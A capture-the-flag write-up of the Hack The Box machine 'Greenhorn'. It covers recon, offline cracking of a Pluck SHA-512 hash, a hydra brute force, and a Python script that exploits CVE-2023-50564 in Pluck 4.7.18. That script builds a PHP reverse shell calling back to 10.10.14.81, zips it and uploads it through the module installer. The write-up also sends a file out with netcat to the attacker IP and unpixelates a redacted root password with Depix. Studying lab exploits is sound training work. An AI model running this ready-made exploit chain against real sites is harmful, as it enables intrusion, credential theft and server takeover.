Linux - Easy - Greenhorn

Recon

[screenshot]

└──╼ $nmap -p- -A greenhorn.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 08:25 UTC
Nmap scan report for greenhorn.htb (10.129.178.31)
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-title: Welcome to GreenHorn ! - GreenHorn
|_Requested resource was http://greenhorn.htb/?file=welcome-to-greenhorn
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-generator: pluck 4.7.18
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=f8472946e7bb7aee; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=10zNRFqpKaYuRFW_9-ZNG2Lip3U6MTcyNDE0MjI5MzcwMzQ2NDk2OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 20 Aug 2024 08:24:53 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=937130857acd1ee9; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=wEK50eH4jJ0NOpyY-HHhkxBO6DA6MTcyNDE0MjI5ODc4OTQ0NTMxNQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 20 Aug 2024 08:24:58 GMT
|_    Content-Length: 0
└──╼ $gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://greenhorn.htb  --append-domain -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://greenhorn.htb
[+] Method:          GET
[+] Threads:         200
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 3000000 / 3000001 (100.00%)
===============================================================
Finished
===============================================================

[screenshots]

Most of the sites return 200, but then show:

[screenshot]

Gitea

Gitea is running on port 3000.
We can create an account and discover one repo on it.

[screenshot]

We can find one other user watching this repo: admin.

[screenshot]

No CVE and no interesting files.

Addendum

What I found later: there is no need to use hydra, as the Gitea repo contains a file GreenHorn/data/settings/pass.php with a hash.

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

The hash is 128 hex characters, the length of an unsalted SHA-512 digest (what Pluck stores for its admin password). We can crack it offline and get the Pluck password instead of brute-forcing the login form with hydra.
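As an added example (not part of the original writeup), a small Python script that pulls the $ww value out of pass.php, guesses the algorithm from the digest length and tries candidates offline. The pass.php text is a constructed copy of the file shown above; the short candidate list is a constructed stand-in for rockyou.txt, and crack_wordlist_file streams a real wordlist from disk.

```python
import hashlib
import re
from typing import Iterable, Optional

# Constructed copy of the pass.php found in the Gitea repo (hash as shown above).
PASS_PHP = """<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>
"""

# Unsalted hex digest lengths -> hashlib algorithm name.
DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def extract_hash(php_source: str) -> str:
    """Pull the hex digest out of Pluck's $ww = '...' assignment."""
    match = re.search(r"\$ww\s*=\s*'([0-9a-fA-F]+)'", php_source)
    if match is None:
        raise ValueError("no $ww assignment with a hex digest found")
    return match.group(1).lower()


def guess_algorithm(hexdigest: str) -> str:
    """Guess an unsalted hash algorithm from the digest length (128 hex chars -> SHA-512)."""
    return DIGEST_LENGTHS.get(len(hexdigest), "unknown")


def hash_password(password: str, algorithm: str = "sha512") -> str:
    """Hash a candidate the way an unsalted Pluck pass.php entry is stored."""
    return hashlib.new(algorithm, password.encode()).hexdigest()


def crack(hexdigest: str, candidates: Iterable[str], algorithm: Optional[str] = None) -> Optional[str]:
    """Return the first candidate whose digest matches, or None if the list is exhausted."""
    hexdigest = hexdigest.lower()
    algorithm = algorithm or guess_algorithm(hexdigest)
    if algorithm == "unknown":
        raise ValueError(f"unrecognised digest length {len(hexdigest)}")
    for candidate in candidates:
        candidate = candidate.rstrip("\r\n")  # wordlist lines keep their newline
        if hash_password(candidate, algorithm) == hexdigest:
            return candidate
    return None


def crack_wordlist_file(hexdigest: str, path: str) -> Optional[str]:
    """Stream a wordlist such as rockyou.txt from disk instead of loading it into memory."""
    with open(path, "r", encoding="latin-1") as handle:
        return crack(hexdigest, handle)


if __name__ == "__main__":
    target = extract_hash(PASS_PHP)
    print(f"algorithm guess: {guess_algorithm(target)}")
    # Constructed stand-in for rockyou.txt; for the real run use
    # crack_wordlist_file(target, "/usr/share/wordlists/rockyou.txt").
    print(f"cracked: {crack(target, ['password', 'admin', 'iloveyou1'])}")
```

Guessing the algorithm from the length only works because the digest is unsalted and plain hex; a salted or iterated scheme (bcrypt, PBKDF2) needs the application's own hashing routine instead.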

CVE-2023-50564

Our main target seems to be the Pluck CMS on port 80:

[screenshot]

Pluck tells us its version (4.7.18, per the http-generator header in the nmap output), and that version has a CVE ready for us:
https://nvd.nist.gov/vuln/detail/CVE-2023-50564

All of the exploit scripts require a username and password, which we do not have yet.
We can “fix” this by running hydra against the login form. Pluck's login form has no username field (it only posts the password as cont1), so the -l admin login below is just a placeholder:

└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt greenhorn.htb http-post-form "/login.php:cont1=^PASS^&bogus=&submit=Log+in:F=Password incorrect."
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-20 09:45:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://greenhorn.htb:80/login.php:cont1=^PASS^&bogus=&submit=Log+in:F=Password incorrect.
[80][http-post-form] host: greenhorn.htb   login: admin   password: iloveyou1
1 of 1 target successfully completed, 1 valid password found

We are in; time to try out the CVE:
https://www.exploit-db.com/exploits/51592

None of the scripts worked for me. I ended up manually uploading php-reverse-shell in a zip, and it did work, so I do not understand why those scripts were even created.
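As an added example (not the author's script and not from exploit-db), the manual route above done with the Python standard library only: generate a reverse-shell PHP file, pack it into a zip, and upload it through the module installer after logging in with the password hydra found. The login fields (cont1, bogus, submit) come from the hydra command above; the listener address 10.10.14.81 is the one the writeup uses later. Everything else is an assumption: port 4444, the file names shell.php/shell.zip, and the installer endpoint admin.php?action=installmodule with a file input named sendfile, which is what the public CVE-2023-50564 PoCs use and should be checked against the target's HTML before running.

```python
import http.cookiejar
import io
import urllib.request
import uuid
import zipfile
from urllib.parse import urlencode


def reverse_shell_php(lhost: str, lport: int) -> bytes:
    """Minimal PHP reverse shell (constructed here; the writeup used pentestmonkey's php-reverse-shell)."""
    return (
        "<?php\n"
        f"$sock = fsockopen('{lhost}', {lport});\n"
        "$proc = proc_open('/bin/sh -i', [0 => $sock, 1 => $sock, 2 => $sock], $pipes);\n"
        "proc_close($proc);\n"
    ).encode()


def build_module_zip(php_source: bytes, php_name: str) -> bytes:
    """Pack the PHP file into an in-memory zip, the format Pluck's module installer accepts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(php_name, php_source)
    return buf.getvalue()


def list_zip(zip_bytes: bytes) -> list:
    """Return the member names of an in-memory zip (to check what was built)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        return archive.namelist()


def multipart_body(fields: dict, file_field: str, filename: str, content: bytes):
    """Hand-rolled multipart/form-data encoding so no third-party HTTP library is needed."""
    boundary = uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts += [f"--{boundary}".encode(),
                  f'Content-Disposition: form-data; name="{name}"'.encode(),
                  b"", value.encode()]
    parts += [f"--{boundary}".encode(),
              f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"'.encode(),
              b"Content-Type: application/zip", b"", content]
    parts += [f"--{boundary}--".encode(), b""]
    return b"\r\n".join(parts), f"multipart/form-data; boundary={boundary}"


def upload_module(base_url: str, password: str, zip_bytes: bytes, zip_name: str) -> int:
    """Log in to Pluck and upload the zip through the module installer; returns the HTTP status.

    Assumed (verify against the target's HTML): installer at admin.php?action=installmodule
    with a file input named "sendfile", as in the public CVE-2023-50564 PoCs.
    """
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    # Login form fields exactly as in the hydra command above: password only, no username.
    login = urlencode({"cont1": password, "bogus": "", "submit": "Log in"}).encode()
    opener.open(f"{base_url}/login.php", data=login)
    body, content_type = multipart_body({}, "sendfile", zip_name, zip_bytes)
    request = urllib.request.Request(f"{base_url}/admin.php?action=installmodule",
                                     data=body, headers={"Content-Type": content_type})
    with opener.open(request) as response:
        return response.status


if __name__ == "__main__":
    # Listener address from the writeup; the port and file names are assumptions.
    payload = build_module_zip(reverse_shell_php("10.10.14.81", 4444), "shell.php")
    print(list_zip(payload))
    # With a listener running (nc -lvnp 4444):
    # upload_module("http://greenhorn.htb", "iloveyou1", payload, "shell.zip")
    # then request the extracted PHP; the PoCs report it under data/modules/<zip name>/,
    # which is an assumption to confirm on the target.
```

The zip is the whole point of the CVE: the installer trusts the archive contents and unpacks them under the web root, so any .php member becomes executable once requested.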

User access

First, shell stabilisation:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# CTRL-Z to background the shell, then from the local terminal:
stty raw -echo; fg

Linpeas returns nothing of value.

pspy:

[screenshots]

After wasting too much time, I tried, as a joke, to log in to user “junior” with the same password as earlier, and it worked. Disappointing.

Priv esc

In our home folder we have a file called “Using OpenVAS.pdf”.
We can send it back to our machine using netcat:

# attacker
nc -l -p 12345 > received_file.pdf

# victim (the file name contains a space, so quote it)
nc 10.10.14.81 12345 < "Using OpenVAS.pdf"

# check the copy arrived intact: the two digests must match
sha256sum "Using OpenVAS.pdf"   # victim
sha256sum received_file.pdf     # attacker

[screenshot]

The password in the PDF is pixelated; there has to be a way to get it back.

I’ve tried https://github.com/bishopfox/unredacter and it failed to do anything. I’ve tried getting data with the strings command and hexedit, nothing. I’ve tried https://github.com/spipm/Depix and at first I gave it input in .png format. Converting to .ppm made it work.

# pdfimages writes PPM (or PBM for monochrome) by default, which is the input format Depix accepts
pdfimages file.pdf file
python3 depix.py -p /home/user/Desktop/file-000.ppm -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o /home/user/Desktop/output.png

[screenshot]

password: sidefromsidetheothersidesidefromsidetheotherside

We are done here. One of the worst rooms I’ve done.